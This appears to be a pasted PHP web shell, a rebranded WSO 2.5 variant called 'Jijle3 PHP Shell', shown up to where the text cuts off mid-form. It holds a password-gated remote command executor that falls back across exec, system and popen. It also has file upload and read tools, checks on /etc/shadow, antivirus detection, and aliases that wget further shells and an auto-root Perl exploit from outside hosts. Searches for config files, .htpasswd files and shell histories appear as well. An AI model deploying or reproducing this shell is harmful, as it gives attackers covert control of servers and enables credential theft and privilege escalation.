· 7 years ago · Oct 06, 2018, 07:16 AM
1<?php
2echo "<link rel='shortcut icon' href='http://www.dz-streaming.eu/favicon.ico'>
3 <style type='text/css'>
4 input[type=submit], input[type=button], input[type=reset]{
5 text-align:center;
6 background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
7 border:1px solid #4D4D4D;
8 color:#CCCCCC;
9 border-top-color:#565656;
10 padding:4px 6px;
11 margin:4px 5px;
12 height:16px;
13 -moz-box-shadow:0 0 1px black;
14 -webkit-box-shadow:0 0 1px black;
15 box-shadow:0 0 1px black;
16 text-shadow:0 1px black;
17 -moz-border-radius:4px;
18 -webkit-border-radius:4px;
19 -khtml-border-radius:4px;
20 border-radius:4px;
21 height:23px;
22}
23input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
24 background-position:center top;
25 text-decoration:none;
26}
27input[type=text], input[type=password]{
28 background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
29 border:1px solid #4D4D4D;
30 color:#CCCCCC;
31 border-top-color:#565656;
32 -moz-box-shadow:0 0 1px black;
33 -webkit-box-shadow:0 0 1px black;
34 box-shadow:0 0 1px black;
35 -moz-border-radius:4px;
36 -webkit-border-radius:4px;
37 -khtml-border-radius:4px;
38 border-radius:4px;
39 height:18px;
40 margin-left: 5px;
41}
42input , textarea , button , body , caption , table ,area , option {
43 outline:none;
44 transition: all 0.20s ease-in-out;
45 -webkit-transition: all 0.25s ease-in-out;
46 -moz-transition: all 0.25s ease-in-out;
47 border-radius:3px;
48 -webkit-border-radius:3px;
49 -moz-border-radius:3px;
50 border:1px solid rgba(0,0,0, 0.2);
51 /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
52}
53input , textarea {
54 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
55}
56input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus {
57 box-shadow: 0 0 5px rgba(0, 0, 255, 1);
58 -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
59 -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
60 border: 1px solid #CCCC00;
61 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
62 overflow: auto;
63/* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
64}
65body{
66/* font-family : Verdana; */
67 color : #f9f6f1;
68 font-size : 0.7em;
69 background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
70}
71input , textarea {
72 outline:none;
73 transition: all 0.20s ease-in-out;
74 -webkit-transition: all 0.25s ease-in-out;
75 -moz-transition: all 0.25s ease-in-out;
76 border-radius:3px;
77 -webkit-border-radius:3px;
78 -moz-border-radius:3px;
79 border:1px solid rgba(0,0,0, 0.2);
80}
81input:focus, textarea:focus {
82 outline: 0;
83 border-color: rgba(82, 168, 236, 0.8);
84 -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
85 -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
86 box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
87 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
88 overflow: auto;
89}
90 </style>
91 ";
92# jijle3 login
93#$auth_pass = md5('Jijle3');
94#$color = "#df5";
95#$default_action = 'Home';
96#$default_use_ajax = true;
97#$default_charset = 'Windows-1251';
98
99#if(!empty($_SERVER['HTTP_USER_AGENT'])) {
100 # $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
101 #if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
102 # header('HTTP/1.0 404 Not Found');
103 # exit;
104 # }
105#}
106
107@ini_set('error_log',NULL);
108@ini_set('log_errors',0);
109@ini_set('max_execution_time',0);
110@set_time_limit(0);
111@set_magic_quotes_runtime(0);
112@define('WSO_VERSION', '2.5');
113
114if(get_magic_quotes_gpc()) {
115 function WSOstripslashes($array) {
116 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
117 }
118 $_POST = WSOstripslashes($_POST);
119 $_COOKIE = WSOstripslashes($_COOKIE);
120}
121
122function wsoLogin() {
123 die("<center><span>Password : </span><input type=password name=pass><input type=submit value='Enter'></form></pre>");
124}
125function WSOsetcookie($k, $v) {
126 $_COOKIE[$k] = $v;
127 setcookie($k, $v);
128}
129
130if(!empty($auth_pass)) {
131 if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
132 WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
133
134 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
135 wsoLogin();
136}
137
138if(strtolower(substr(PHP_OS,0,3)) == "win")
139 $os = 'win';
140else
141 $os = 'nix';
142
143$safe_mode = @ini_get('safe_mode');
144if(!$safe_mode)
145 error_reporting(0);
146
147$disable_functions = @ini_get('disable_functions');
148$home_cwd = @getcwd();
149if(isset($_POST['c']))
150 @chdir($_POST['c']);
151$cwd = @getcwd();
152if($os == 'win') {
153 $home_cwd = str_replace("\\", "/", $home_cwd);
154 $cwd = str_replace("\\", "/", $cwd);
155}
156if($cwd[strlen($cwd)-1] != '/')
157 $cwd .= '/';
158
159if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
160 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
161
162if($os == 'win')
163 $aliases = array(
164 "List Directory" => "dir",
165 "Find index.php in current dir" => "dir /s /w /b index.php",
166 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
167 "Show active connections" => "netstat -an",
168 "Show running services" => "net start",
169 "User accounts" => "net user",
170 "Show computers" => "net view",
171 "ARP Table" => "arp -a",
172 "IP Configuration" => "ipconfig /all"
173 );
174else
175 $aliases = array(
176 "List dir" => "ls -lha",
177 "list file attributes on a Linux second extended file system" => "lsattr -va",
178 "show opened ports" => "netstat -an | grep -i listen",
179 "process status" => "ps aux",
180 "Jijle3 : Get Nother Shells"=>"",
181 "Dhanush Shell | pass:Jijle3"=>"wget http://download1582.mediafire.com/9jtscxv4qdzg/7zq2q32v02kz59j/dhanush.php.zip ; unzip dhanush.php.zip",
182 "K2ll33d Shell "=>"wget http://download1643.mediafire.com/iq7073edn7pg/3vqec9bm5krrdrj/kil223dd.php.zip ; unzip kil223dd.php.zip",
183 "1n73ction Shell | pass:1n73ction "=>"wget http://download1512.mediafire.com/m8hgk0nnrupg/954ho11nt2b48w8/1n73ction.php.zip ; unzip 1n73ction.php.zip",
184 "Cyber Shell | pass:Jijle3"=>"wget http://download1512.mediafire.com/phidtd82s8vg/q6qx0xhcd1efzd5/cyb3.php.zip ; unzip cyb3.php.zip",
185 "Jijle3 : Some Commonds"=>"",
186 "Logged in users"=>"w",
187 "Last to connect"=>"lastlog",
188 "IP Addresses"=>"cat /etc/hosts",
189 "Check MMAP"=>"cat /proc/sys/vm/mmap_min_addr",
190 "USER WITHOUT PASSWORD!"=>"cut -d: -f1,2,3 /etc/passwd | grep ::",
191 "List of Cpanel`s domains(valiases)"=>"ls -l /etc/valiases",
192 "Downloaders?)"=>"which wget curl w3m lynx",
193 "Show running proccess"=>"ps aux",
194 "Memory check"=>"cat /proc/meminfo",
195 "Get cpanel logs"=>"cat /var/cpanel/accounting.log",
196 "Jijle3 : Auto Root Commonds"=>"",
197 "First ! : GET Auto Root File [ Perl ]"=>"wget http://download944.mediafire.com/5fi1yfk5ttcg/u4seoaw7ze1dio0/phdz.pl.zip ; unzip phdz.pl.zip ; ./phdz.pl",
198 "AutoRoot [ Linux ]"=>"perl phdz.pl linux",
199 "AutoRoot [ FreeBSD ]"=>"perl phdz.pl bsd",
200 "AutoRoot [ SunOS ]"=>"perl phdz.pl sunos",
201 "Find" => "",
202 "find all suid files" => "find / -type f -perm -04000 -ls",
203 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
204 "find all sgid files" => "find / -type f -perm -02000 -ls",
205 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
206 "find config.inc.php files" => "find / -type f -name config.inc.php",
207 "find config* files" => "find / -type f -name \"config*\"",
208 "find config* files in current dir" => "find . -type f -name \"config*\"",
209 "find all writable folders and files" => "find / -perm -2 -ls",
210 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
211 "find all service.pwd files" => "find / -type f -name service.pwd",
212 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
213 "find all .htpasswd files" => "find / -type f -name .htpasswd",
214 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
215 "find all .bash_history files" => "find / -type f -name .bash_history",
216 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
217 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
218 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
219 "Locate" => "",
220 "locate httpd.conf files" => "locate httpd.conf",
221 "locate vhosts.conf files" => "locate vhosts.conf",
222 "locate proftpd.conf files" => "locate proftpd.conf",
223 "locate psybnc.conf files" => "locate psybnc.conf",
224 "locate my.conf files" => "locate my.conf",
225 "locate admin.php files" =>"locate admin.php",
226 "locate cfg.php files" => "locate cfg.php",
227 "locate conf.php files" => "locate conf.php",
228 "locate config.dat files" => "locate config.dat",
229 "locate config.php files" => "locate config.php",
230 "locate config.inc files" => "locate config.inc",
231 "locate config.inc.php" => "locate config.inc.php",
232 "locate config.default.php files" => "locate config.default.php",
233 "locate config* files " => "locate config",
234 "locate .conf files"=>"locate '.conf'",
235 "locate .pwd files" => "locate '.pwd'",
236 "locate .sql files" => "locate '.sql'",
237 "locate .htpasswd files" => "locate '.htpasswd'",
238 "locate .bash_history files" => "locate '.bash_history'",
239 "locate .mysql_history files" => "locate '.mysql_history'",
240 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
241 "locate backup files" => "locate backup",
242 "locate dump files" => "locate dump",
243 "locate priv files" => "locate priv"
244 );
245
246function wsoHeader() {
247 if(empty($_POST['charset']))
248 $_POST['charset'] = $GLOBALS['default_charset'];
249 global $color;
250 if(!$color) $color = '#df5';
251 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " | Jijle3 [PHDZ]</title>
252<style>
253body{background-color:#444;color:#e1e1e1;}
254body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
255table.info{ color:#fff;background-color:#222; }
256span,h1,a{ color: $color !important; }
257span{ font-weight: bolder; }
258h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
259div.content{ padding: 5px;margin-left:5px;background-color:#333; }
260a{ text-decoration:none; }
261a:hover{ text-decoration:underline; }
262.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
263.bigarea{ width:100%;height:250px; }
264input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
265form{ margin:0px; }
266#toolsTbl{ text-align:center; }
267.toolsInp{ width: 300px }
268.main th{text-align:left;background-color:#5e5e5e;}
269.main tr:hover{background-color:#5e5e5e}
270.l1{background-color:#444}
271pre{font-family:Courier,Monospace;}
272</style>
273<script>
274 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
275 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
276 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
277 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
278 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
279 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
280 var d = document;
281 function set(a,c,p1,p2,p3,charset) {
282 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
283 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
284 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
285 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
286 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
287 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
288 }
289 function g(a,c,p1,p2,p3,charset) {
290 set(a,c,p1,p2,p3,charset);
291 d.mf.submit();
292 }
293 function a(a,c,p1,p2,p3,charset) {
294 set(a,c,p1,p2,p3,charset);
295 var params = 'ajax=true';
296 for(i=0;i<d.mf.elements.length;i++)
297 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
298 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
299 }
300 function sr(url, params) {
301 if (window.XMLHttpRequest)
302 req = new XMLHttpRequest();
303 else if (window.ActiveXObject)
304 req = new ActiveXObject('Microsoft.XMLHTTP');
305 if (req) {
306 req.onreadystatechange = processReqChange;
307 req.open('POST', url, true);
308 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
309 req.send(params);
310 }
311 }
312 function processReqChange() {
313 if( (req.readyState == 4) )
314 if(req.status == 200) {
315 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
316 var arr=reg.exec(req.responseText);
317 eval(arr[2].substr(0, arr[1]));
318 } else alert('Request error!');
319 }
320
321</script>
322<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
323<form method=post name=mf style='display:none;'>
324<input type=hidden name=a>
325<input type=hidden name=c>
326<input type=hidden name=p1>
327<input type=hidden name=p2>
328<input type=hidden name=p3>
329<input type=hidden name=charset>
330</form>";
331 $freeSpace = @diskfreespace($GLOBALS['cwd']);
332 $totalSpace = @disk_total_space($GLOBALS['cwd']);
333 $totalSpace = $totalSpace?$totalSpace:1;
334 $release = @php_uname('r');
335 $kernel = @php_uname('s');
336 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
337 if(strpos('Linux', $kernel) !== false)
338 $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
339 else
340 $explink .= urlencode($kernel . ' ' . substr($release,0,3));
341 if(!function_exists('posix_getegid')) {
342 $user = @get_current_user();
343 $uid = @getmyuid();
344 $gid = @getmygid();
345 $group = "?";
346 } else {
347 $uid = @posix_getpwuid(posix_geteuid());
348 $gid = @posix_getgrgid(posix_getegid());
349 $user = $uid['name'];
350 $uid = $uid['uid'];
351 $group = $gid['name'];
352 $gid = $gid['gid'];
353 }
354
355 $cwd_links = '';
356 $path = explode("/", $GLOBALS['cwd']);
357 $n=count($path);
358 for($i=0; $i<$n-1; $i++) {
359 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
360 for($j=0; $j<=$i; $j++)
361 $cwd_links .= $path[$j].'/';
362 $cwd_links .= "\")'>".$path[$i]."/</a>";
363 }
364
365 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
366 $opt_charsets = '';
367 foreach($charsets as $item)
368 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
369
370 $m = array('Home'=>'home','Sec Info'=>'SecInfo','Exec'=>'Console','Sql'=>'Sql','Baypass'=>'bypss','Forums'=>'forum','Symlink'=>'symlinker','Domain'=>'domains','Tools'=>'tools','Cgi'=>'cgi','String'=>'StringTools','Network'=>'Network','About'=>'about' );
371 if(!empty($GLOBALS['auth_pass']))
372 $m['Logout'] = 'Logout';
373 $m['Suicide'] = 'SelfRemove';
374 $menu = '';
375
376 foreach($m as $k => $v)
377 $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
378 $drives = "";
379 if($GLOBALS['os'] == 'win') {
380 foreach(range('c','z') as $drive)
381 if(is_dir($drive.':\\'))
382 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
383 }
384 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
385 . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="http://www.exploit-db.com/search/?action=search&filter_description='.urlencode(@php_uname()).'" target="_blank">[ Exploit-db ]</a> <a href="http://www.1337day.com/search" target="_blank">[ 1337day ]</a> <a href="http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q='.urlencode(@php_uname()).'" target="_blank">[ ExploitSearch ]</a> <a href="http://www.shodanhq.com/exploits?q='.urlencode(@php_uname()).'" target="_blank">[ Shodanhq ]</a> </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' ) <span>Locals Pack :</span><a href="http://rghost.net/6YYsd7ynN" target="_blank"> [ Download ]</a></b> <br>' . @phpversion() . '<span>Safe mode:</span> '
386 . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font> ' )
387 . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ File Manager ]</a><br><br>' . $drives . '</td>'
388 . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Your IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr><br>
389</td></tr></table>'
390 . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
391}
392
393
394function wsoFooter() {
395 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
396 echo "
397</div>
398<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
399 <tr>
400 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
401 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
402 </tr><tr>
403 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
404 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
405 </tr><tr>
406 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
407 <td><form method='post' ENCTYPE='multipart/form-data'>
408 <input type=hidden name=a value='FilesMAn'>
409 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
410 <input type=hidden name=p1 value='uploadFile'>
411 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
412 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
413 </tr></table></div></body></html>";
414}
415
416if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
417 function posix_getpwuid($p) {return false;} }
418if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
419 function posix_getgrgid($p) {return false;} }
420
421function wsoEx($in) {
422 $out = '';
423 if (function_exists('exec')) {
424 @exec($in,$out);
425 $out = @join("\n",$out);
426 } elseif (function_exists('passthru')) {
427 ob_start();
428 @passthru($in);
429 $out = ob_get_clean();
430 } elseif (function_exists('system')) {
431 ob_start();
432 @system($in);
433 $out = ob_get_clean();
434 } elseif (function_exists('shell_exec')) {
435 $out = shell_exec($in);
436 } elseif (is_resource($f = @popen($in,"r"))) {
437 $out = "";
438 while(!@feof($f))
439 $out .= fread($f,1024);
440 pclose($f);
441 }
442 return $out;
443}
444
445function wsoViewSize($s) {
446 if($s >= 1073741824)
447 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
448 elseif($s >= 1048576)
449 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
450 elseif($s >= 1024)
451 return sprintf('%1.2f', $s / 1024 ) . ' KB';
452 else
453 return $s . ' B';
454}
455
456function wsoPerms($p) {
457 if (($p & 0xC000) == 0xC000)$i = 's';
458 elseif (($p & 0xA000) == 0xA000)$i = 'l';
459 elseif (($p & 0x8000) == 0x8000)$i = '-';
460 elseif (($p & 0x6000) == 0x6000)$i = 'b';
461 elseif (($p & 0x4000) == 0x4000)$i = 'd';
462 elseif (($p & 0x2000) == 0x2000)$i = 'c';
463 elseif (($p & 0x1000) == 0x1000)$i = 'p';
464 else $i = 'u';
465 $i .= (($p & 0x0100) ? 'r' : '-');
466 $i .= (($p & 0x0080) ? 'w' : '-');
467 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
468 $i .= (($p & 0x0020) ? 'r' : '-');
469 $i .= (($p & 0x0010) ? 'w' : '-');
470 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
471 $i .= (($p & 0x0004) ? 'r' : '-');
472 $i .= (($p & 0x0002) ? 'w' : '-');
473 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
474 return $i;
475}
476
477function wsoPermsColor($f) {
478 if (!@is_readable($f))
479 return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
480 elseif (!@is_writable($f))
481 return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
482 else
483 return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
484}
485
486function wsoScandir($dir) {
487 if(function_exists("scandir")) {
488 return scandir($dir);
489 } else {
490 $dh = opendir($dir);
491 while (false !== ($filename = readdir($dh)))
492 $files[] = $filename;
493 return $files;
494 }
495}
496
497function wsoWhich($p) {
498 $path = wsoEx('which ' . $p);
499 if(!empty($path))
500 return $path;
501 return false;
502}
503
504function actionSecInfo() {
505 wsoHeader();
506//Sec info
507echo '<h1>Server Security Info</h1><div class=content>';
508?>
509</div>
510</center>
511<?php
512 function wsoSecParam($n, $v) {
513 $v = trim($v);
514 if($v) {
515 echo '<span>' . $n . ': </span>';
516 if(strpos($v, "\n") === false)
517 echo $v . '<br>';
518 else
519 echo '<pre class=ml1>' . $v . '</pre>';
520 }
521 }
522
523 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
524 if(function_exists('apache_get_modules'))
525 wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
526 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
527 wsoSecParam('Open base dir', @ini_get('open_basedir'));
528 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
529 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
530 wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
531 $temp=array();
532 if(function_exists('mysql_get_client_info'))
533 $temp[] = "MySql (".mysql_get_client_info().")";
534 if(function_exists('mssql_connect'))
535 $temp[] = "MSSQL";
536 if(function_exists('pg_connect'))
537 $temp[] = "PostgreSQL";
538 if(function_exists('oci_connect'))
539 $temp[] = "Oracle";
540 wsoSecParam('Supported databases', implode(', ', $temp));
541 echo '<br>';
542
543 if($GLOBALS['os'] == 'nix') {
544 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
545 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
546 wsoSecParam('OS version', @file_get_contents('/proc/version'));
547 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
548 if(!$GLOBALS['safe_mode']) {
549 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
550 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
551 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
552 echo '<br>';
553 $temp=array();
554 foreach ($userful as $item)
555 if(wsoWhich($item))
556 $temp[] = $item;
557 wsoSecParam('Userful', implode(', ',$temp));
558 $temp=array();
559 foreach ($danger as $item)
560 if(wsoWhich($item))
561 $temp[] = $item;
562 wsoSecParam('Danger', implode(', ',$temp));
563 $temp=array();
564 foreach ($downloaders as $item)
565 if(wsoWhich($item))
566 $temp[] = $item;
567 wsoSecParam('Downloaders', implode(', ',$temp));
568 echo '<br/>';
569 wsoSecParam('HDD space', wsoEx('df -h'));
570 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
571 }
572 } else {
573 wsoSecParam('OS Version',wsoEx('ver'));
574 wsoSecParam('Account Settings',wsoEx('net accounts'));
575 wsoSecParam('User Accounts',wsoEx('net user'));
576 }
577 echo '</div>';
578 wsoFooter();
579}
580################# Home #################
581function actionhome() {
582wsoHeader();
583//Home
584echo'
585<center>
586<h1>[ Salam ♥ Alaykoum ]</h1>
587<br /><br />
588</form>
589';
590?><head>
591<body bgcolor="Black"><table width=100% height=100%><td align="center">
592<img src="http://www5.0zz0.com/2014/11/29/18/934285237.png" height="150" title="Martyrs Crew 2015 " width="478" ></img></img><p>
593</img></img><p>
594<span class="style1"><font size="9" color="#FFFFFF" face="Adobe Heiti Std R"></font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#df5" face="Adobe Heiti Std R">
595Jijle3 PHP Shell v 0.1.8</font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#FFFFFF" face="Adobe Heiti Std R"></font></span></p>
596<span>[ Say Hamd Li ' Allah ♥ ] </span>
597<p>
598
599<img src="http://im48.gulfup.com/jIm93E.png" height="92" title="Martyrs Crew Index Logo 2014 " width="178" ></p>
600<p>
601<pre>
602<iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FJ1jeI&width&height=62&colorscheme=light&show_faces=false&header=true&stream=false&show_border=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:62px;" allowTransparency="true"></iframe><pre>
603<p>
604<?
605echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
606echo '</center><br>';
607echo "<br><br><center><b><font face='Tahoma' name=sip color='white' size='2pt'>Jijle3 PHP Web Shell V 0.1.8 (c) Phenomene Dz [ Martyrs Crew ] 2015</font></b></td><font face='Tahoma' color='WHITE' size='2pt' />";
608echo " <b><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing.com
609 </a></b> - <b><a href='http://zone-h.com/archive/ip=".$serverIP."
610' target=\"_blank\">Zone-H.org</a> -  <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/
611' target=\"_blank\">Yougetsignal.com</a>
612 - <b><a href='http://toolbar.netcraft.com/site_report?url=https://" . $_SERVER['HTTP_HOST'] . "&go=&form=QBLH&filt=all' target=\"_blank\">NetCraft.com
613 </a></b> - <b><a href='https://pentest-tools.com/
614' target=\"_blank\">Pentest-Tools.com</a>
615</b></center><br>";
616wsoFooter();}
617################# End Home #################
618function actionlfiscan() {
619 wsoHeader();
620 print '
621 <h3>Led-Zeppelin\'s LFI File dumper</h3>
622
623 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
624 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
625 <option value="1">
626 Access Log
627 </option>
628
629 <option value="2">
630 httpd.conf
631 </option>
632
633 <option value="3">
634 Error Log
635 </option>
636 <option value="4">
637 php.ini
638 </option>
639 <option value="5">
640 MySQL
641 </option>
642 <option value="6">
643 FTP
644 </option>
645 <option value="7">
646 Environ
647 </option>
648 </select> Null: <select name="null">
649 <option value="%00">
650 Yes
651 </option>
652
653 <option value="">
654 No
655 </option>
656 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
